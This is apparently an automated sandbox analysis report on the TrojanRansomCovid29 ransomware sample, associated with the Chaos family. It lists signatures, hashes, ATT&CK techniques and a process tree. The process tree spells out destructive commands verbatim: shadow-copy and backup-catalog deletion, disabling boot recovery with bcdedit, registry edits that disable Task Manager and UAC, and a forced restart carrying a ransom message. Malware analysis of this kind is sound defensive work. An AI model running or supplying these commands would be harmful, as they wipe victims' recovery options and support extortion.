Overview
overview
10Static
static
10TrojanRans...29.exe
windows7-x64
10TrojanRans...29.exe
windows10-2004-x64
10source/Bat...er.exe
windows7-x64
5source/Bat...er.exe
windows10-2004-x64
5source/Bat...lp.chm
windows7-x64
1source/Bat...lp.chm
windows10-2004-x64
1source/Cov29Cry.exe
windows7-x64
10source/Cov29Cry.exe
windows10-2004-x64
10source/Cov...v4.exe
windows7-x64
10source/Cov...v4.exe
windows10-2004-x64
10source/Cov...ry.exe
windows7-x64
10source/Cov...ry.exe
windows10-2004-x64
10source/Cov...en.exe
windows7-x64
3source/Cov...en.exe
windows10-2004-x64
3source/Cov...en.exe
windows7-x64
3source/Cov...en.exe
windows10-2004-x64
3source/Tro...29.bat
windows7-x64
10source/Tro...29.bat
windows10-2004-x64
10source/mbr.exe
windows7-x64
6source/mbr.exe
windows10-2004-x64
6Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
10-12-2024 20:27
Behavioral task
behavioral1
Sample
TrojanRansomCovid29.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
TrojanRansomCovid29.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
source/Bat To Exe Converter/Bat_To_Exe_Converter.exe
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
source/Bat To Exe Converter/Bat_To_Exe_Converter.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
source/Bat To Exe Converter/help.chm
Resource
win7-20241010-en
Behavioral task
behavioral6
Sample
source/Bat To Exe Converter/help.chm
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
source/Cov29Cry.exe
Resource
win7-20240708-en
Behavioral task
behavioral8
Sample
source/Cov29Cry.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
source/Cov29Cry/Chaos Ransomware Builder v4.exe
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
source/Cov29Cry/Chaos Ransomware Builder v4.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
source/Cov29Cry/Cov29Cry.exe
Resource
win7-20240729-en
Behavioral task
behavioral12
Sample
source/Cov29Cry/Cov29Cry.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
source/Cov29LockScreen.exe
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
source/Cov29LockScreen.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
source/Cov29LockScreen/Cov29LockScreen.exe
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
source/Cov29LockScreen/Cov29LockScreen.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
source/TrojanRansomCovid29.bat
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
source/TrojanRansomCovid29.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral19
Sample
source/mbr.exe
Resource
win7-20240708-en
Behavioral task
behavioral20
Sample
source/mbr.exe
Resource
win10v2004-20241007-en
General
-
Target
source/TrojanRansomCovid29.bat
-
Size
1KB
-
MD5
57f0432c8e31d4ff4da7962db27ef4e8
-
SHA1
d5023b3123c0b7fae683588ac0480cd2731a0c5e
-
SHA256
b82e64e533789c639d8e193b78e06fc028ea227f55d7568865120be080179afc
-
SHA512
bc082486503a95f8e2ce7689d31423386a03054c5e8e20e61250ca7b7a701e98489f5932eba4837e05ec935057f18633798a10f6f84573a95fcf086ee7cabcbf
Malware Config
Signatures
-
Chaos
Ransomware family first seen in June 2021.
-
Chaos Ransomware 2 IoCs
resource yara_rule behavioral18/files/0x0007000000023cb4-12.dat family_chaos behavioral18/memory/1440-15-0x00000000002D0000-0x00000000002F0000-memory.dmp family_chaos -
Chaos family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 3452 bcdedit.exe 3088 bcdedit.exe -
pid Process 1644 wbadmin.exe -
Disables Task Manager via registry modification
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation Cov29Cry.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation svchost.exe -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\covid29-is-here.txt svchost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.url svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini svchost.exe -
Executes dropped EXE 3 IoCs
pid Process 3164 mbr.exe 1440 Cov29Cry.exe 3396 svchost.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 34 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini svchost.exe File opened for modification C:\Users\Public\Documents\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini svchost.exe File opened for modification C:\Users\Public\Videos\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Documents\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini svchost.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini svchost.exe File opened for modification C:\Users\Public\Pictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini svchost.exe File opened for modification C:\Users\Public\Desktop\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Links\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Videos\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini svchost.exe File opened for modification C:\Users\Public\Music\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Music\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini svchost.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-493223053-2004649691-1575712786-1000\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Searches\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini svchost.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 mbr.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\73f8r6xil.jpg" svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mbr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Cov29LockScreen.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1448 PING.EXE 4404 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3708 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 4792 taskkill.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings cmd.exe -
Modifies registry key 1 TTPs 7 IoCs
pid Process 4504 reg.exe 5112 reg.exe 1488 reg.exe 5004 reg.exe 4000 reg.exe 3664 reg.exe 1772 reg.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 4404 PING.EXE 1448 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3396 svchost.exe -
Suspicious behavior: EnumeratesProcesses 53 IoCs
pid Process 1440 Cov29Cry.exe 1440 Cov29Cry.exe 1440 Cov29Cry.exe 1440 Cov29Cry.exe 1440 Cov29Cry.exe 1440 Cov29Cry.exe 1440 Cov29Cry.exe 1440 Cov29Cry.exe 1440 Cov29Cry.exe 1440 Cov29Cry.exe 1440 Cov29Cry.exe 1440 Cov29Cry.exe 1440 Cov29Cry.exe 1440 Cov29Cry.exe 1440 Cov29Cry.exe 1440 Cov29Cry.exe 1440 Cov29Cry.exe 1440 Cov29Cry.exe 1440 Cov29Cry.exe 1440 Cov29Cry.exe 1440 Cov29Cry.exe 1440 Cov29Cry.exe 1440 Cov29Cry.exe 1440 Cov29Cry.exe 1440 Cov29Cry.exe 1440 Cov29Cry.exe 1440 Cov29Cry.exe 1440 Cov29Cry.exe 1440 Cov29Cry.exe 3396 svchost.exe 3396 svchost.exe 3396 svchost.exe 3396 svchost.exe 3396 svchost.exe 3396 svchost.exe 3396 svchost.exe 3396 svchost.exe 3396 svchost.exe 3396 svchost.exe 3396 svchost.exe 3396 svchost.exe 3396 svchost.exe 3396 svchost.exe 3396 svchost.exe 3396 svchost.exe 3396 svchost.exe 3396 svchost.exe 3396 svchost.exe 3396 svchost.exe 3396 svchost.exe 3396 svchost.exe 3396 svchost.exe 3396 svchost.exe -
Suspicious use of AdjustPrivilegeToken 53 IoCs
description pid Process Token: SeShutdownPrivilege 1848 shutdown.exe Token: SeRemoteShutdownPrivilege 1848 shutdown.exe Token: SeDebugPrivilege 1440 Cov29Cry.exe Token: SeDebugPrivilege 3396 svchost.exe Token: SeBackupPrivilege 2900 vssvc.exe Token: SeRestorePrivilege 2900 vssvc.exe Token: SeAuditPrivilege 2900 vssvc.exe Token: SeIncreaseQuotaPrivilege 1000 WMIC.exe Token: SeSecurityPrivilege 1000 WMIC.exe Token: SeTakeOwnershipPrivilege 1000 WMIC.exe Token: SeLoadDriverPrivilege 1000 WMIC.exe Token: SeSystemProfilePrivilege 1000 WMIC.exe Token: SeSystemtimePrivilege 1000 WMIC.exe Token: SeProfSingleProcessPrivilege 1000 WMIC.exe Token: SeIncBasePriorityPrivilege 1000 WMIC.exe Token: SeCreatePagefilePrivilege 1000 WMIC.exe Token: SeBackupPrivilege 1000 WMIC.exe Token: SeRestorePrivilege 1000 WMIC.exe Token: SeShutdownPrivilege 1000 WMIC.exe Token: SeDebugPrivilege 1000 WMIC.exe Token: SeSystemEnvironmentPrivilege 1000 WMIC.exe Token: SeRemoteShutdownPrivilege 1000 WMIC.exe Token: SeUndockPrivilege 1000 WMIC.exe Token: SeManageVolumePrivilege 1000 WMIC.exe Token: 33 1000 WMIC.exe Token: 34 1000 WMIC.exe Token: 35 1000 WMIC.exe Token: 36 1000 WMIC.exe Token: SeIncreaseQuotaPrivilege 1000 WMIC.exe Token: SeSecurityPrivilege 1000 WMIC.exe Token: SeTakeOwnershipPrivilege 1000 WMIC.exe Token: SeLoadDriverPrivilege 1000 WMIC.exe Token: SeSystemProfilePrivilege 1000 WMIC.exe Token: SeSystemtimePrivilege 1000 WMIC.exe Token: SeProfSingleProcessPrivilege 1000 WMIC.exe Token: SeIncBasePriorityPrivilege 1000 WMIC.exe Token: SeCreatePagefilePrivilege 1000 WMIC.exe Token: SeBackupPrivilege 1000 WMIC.exe Token: SeRestorePrivilege 1000 WMIC.exe Token: SeShutdownPrivilege 1000 WMIC.exe Token: SeDebugPrivilege 1000 WMIC.exe Token: SeSystemEnvironmentPrivilege 1000 WMIC.exe Token: SeRemoteShutdownPrivilege 1000 WMIC.exe Token: SeUndockPrivilege 1000 WMIC.exe Token: SeManageVolumePrivilege 1000 WMIC.exe Token: 33 1000 WMIC.exe Token: 34 1000 WMIC.exe Token: 35 1000 WMIC.exe Token: 36 1000 WMIC.exe Token: SeBackupPrivilege 1436 wbengine.exe Token: SeRestorePrivilege 1436 wbengine.exe Token: SeSecurityPrivilege 1436 wbengine.exe Token: SeDebugPrivilege 4792 taskkill.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4696 Cov29LockScreen.exe -
Suspicious use of WriteProcessMemory 52 IoCs
description pid Process procid_target PID 4060 wrote to memory of 3812 4060 cmd.exe 84 PID 4060 wrote to memory of 3812 4060 cmd.exe 84 PID 4060 wrote to memory of 1448 4060 cmd.exe 85 PID 4060 wrote to memory of 1448 4060 cmd.exe 85 PID 4060 wrote to memory of 3664 4060 cmd.exe 86 PID 4060 wrote to memory of 3664 4060 cmd.exe 86 PID 4060 wrote to memory of 1772 4060 cmd.exe 87 PID 4060 wrote to memory of 1772 4060 cmd.exe 87 PID 4060 wrote to memory of 4504 4060 cmd.exe 88 PID 4060 wrote to memory of 4504 4060 cmd.exe 88 PID 4060 wrote to memory of 5112 4060 cmd.exe 89 PID 4060 wrote to memory of 5112 4060 cmd.exe 89 PID 4060 wrote to memory of 1488 4060 cmd.exe 90 PID 4060 wrote to memory of 1488 4060 cmd.exe 90 PID 4060 wrote to memory of 5004 4060 cmd.exe 91 PID 4060 wrote to memory of 5004 4060 cmd.exe 91 PID 4060 wrote to memory of 4000 4060 cmd.exe 92 PID 4060 wrote to memory of 4000 4060 cmd.exe 92 PID 4060 wrote to memory of 3164 4060 cmd.exe 93 PID 4060 wrote to memory of 3164 4060 cmd.exe 93 PID 4060 wrote to memory of 3164 4060 cmd.exe 93 PID 4060 wrote to memory of 1440 4060 cmd.exe 94 PID 4060 wrote to memory of 1440 4060 cmd.exe 94 PID 4060 wrote to memory of 1848 4060 cmd.exe 95 PID 4060 wrote to memory of 1848 4060 cmd.exe 95 PID 4060 wrote to memory of 4404 4060 cmd.exe 97 PID 4060 wrote to memory of 4404 4060 cmd.exe 97 PID 1440 wrote to memory of 3396 1440 Cov29Cry.exe 100 PID 1440 wrote to memory of 3396 1440 Cov29Cry.exe 100 PID 3396 wrote to memory of 3324 3396 svchost.exe 101 PID 3396 wrote to memory of 3324 3396 svchost.exe 101 PID 3324 wrote to memory of 3708 3324 cmd.exe 103 PID 3324 wrote to memory of 3708 3324 cmd.exe 103 PID 3324 wrote to memory of 1000 3324 cmd.exe 107 PID 3324 wrote to memory of 1000 3324 cmd.exe 107 PID 3396 wrote to memory of 2612 3396 svchost.exe 110 PID 3396 wrote to memory of 2612 3396 svchost.exe 110 PID 2612 wrote to memory of 3452 2612 cmd.exe 112 PID 2612 wrote to memory of 3452 2612 cmd.exe 112 PID 2612 wrote to memory of 3088 2612 cmd.exe 113 PID 2612 wrote to memory of 3088 2612 cmd.exe 113 PID 3396 wrote to memory of 2676 3396 svchost.exe 114 PID 3396 wrote to memory of 2676 3396 svchost.exe 114 PID 2676 wrote to memory of 1644 2676 cmd.exe 116 PID 2676 wrote to memory of 1644 2676 cmd.exe 116 PID 3396 wrote to memory of 2276 3396 svchost.exe 123 PID 3396 wrote to memory of 2276 3396 svchost.exe 123 PID 4060 wrote to memory of 4792 4060 cmd.exe 125 PID 4060 wrote to memory of 4792 4060 cmd.exe 125 PID 4060 wrote to memory of 4696 4060 cmd.exe 126 PID 4060 wrote to memory of 4696 4060 cmd.exe 126 PID 4060 wrote to memory of 4696 4060 cmd.exe 126 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\source\TrojanRansomCovid29.bat"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4060 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\source\fakeerror.vbs"2⤵PID:3812
-
-
C:\Windows\system32\PING.EXEping localhost -n 22⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1448
-
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
PID:3664
-
-
C:\Windows\system32\reg.exereg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
PID:1772
-
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
PID:4504
-
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
PID:5112
-
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
PID:1488
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f2⤵
- UAC bypass
- Modifies registry key
PID:5004
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- UAC bypass
- Modifies registry key
PID:4000
-
-
C:\Users\Admin\AppData\Local\Temp\source\mbr.exembr.exe2⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- System Location Discovery: System Language Discovery
PID:3164
-
-
C:\Users\Admin\AppData\Local\Temp\source\Cov29Cry.exeCov29Cry.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1440 -
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Drops desktop.ini file(s)
- Sets desktop wallpaper using registry
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3396 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete4⤵
- Suspicious use of WriteProcessMemory
PID:3324 -
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet5⤵
- Interacts with shadow copies
PID:3708
-
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no4⤵
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures5⤵
- Modifies boot configuration data using bcdedit
PID:3452
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no5⤵
- Modifies boot configuration data using bcdedit
PID:3088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet4⤵
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet5⤵
- Deletes backup catalog
PID:1644
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\covid29-is-here.txt4⤵PID:2276
-
-
-
-
C:\Windows\system32\shutdown.exeshutdown /r /t 300 /c "5 minutes to pay until you lose your data and system forever"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1848
-
-
C:\Windows\system32\PING.EXEping localhost -n 92⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4404
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im explorer.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4792
-
-
C:\Users\Admin\AppData\Local\Temp\source\Cov29LockScreen.exeCov29LockScreen.exe2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4696
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2900
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1436
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:3508
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:4492
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Direct Volume Access
1Impair Defenses
1Disable or Modify Tools
1Indicator Removal
3File Deletion
3Modify Registry
3Pre-OS Boot
1Bootkit
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
103KB
MD58bcd083e16af6c15e14520d5a0bd7e6a
SHA1c4d2f35d1fdb295db887f31bbc9237ac9263d782
SHA256b4f78ff66dc3f5f8ddd694166e6b596d533830792f9b5f1634d3f5f17d6a884a
SHA51235999577be0626b50eeab65b493d48af2ab42b699f7241d2780647bf7d72069216d99f5f708337a109e79b9c9229613b8341f44c6d96245fd1f3ac9f05814d6a
-
Filesize
144B
MD5c0437fe3a53e181c5e904f2d13431718
SHA144f9547e7259a7fb4fe718e42e499371aa188ab6
SHA256f2571f03eb9d5ee4dca29a8fec1317ded02973c5dd233d582f56cebe98544f22
SHA512a6b488fc74dc69fc4227f92a06deb297d19cd54b0e07659f9c9a76ce15d1ef1d8fa4d607acdd03d30d3e2be2a0f59503e27fc95f03f3006e137fa2f92825e7e3
-
Filesize
1.3MB
MD535af6068d91ba1cc6ce21b461f242f94
SHA1cb054789ff03aa1617a6f5741ad53e4598184ffa
SHA2569ac99df89c676a55b48de00384506f4c232c75956b1e465f7fe437266002655e
SHA512136e3066c6e44af30691bcd76d9af304af0edf69f350211cf74d6713c4c952817a551757194b71c3b49ac3f87a6f0aa88fb80eb1e770d0f0dd82b29bfce80169
-
Filesize
861B
MD5c53dee51c26d1d759667c25918d3ed10
SHA1da194c2de15b232811ba9d43a46194d9729507f0
SHA256dd5b3d185ae1809407e7822de4fced945115b48cc33b2950a8da9ebd77a68c52
SHA512da41cef03f1b5f21a1fca2cfbf1b2b180c261a75d391be3a1ba36e8d4d4aefab8db024391bbee06b99de0cb0b8eb8c89f2a304c27e20c0af171b77db33b2d12c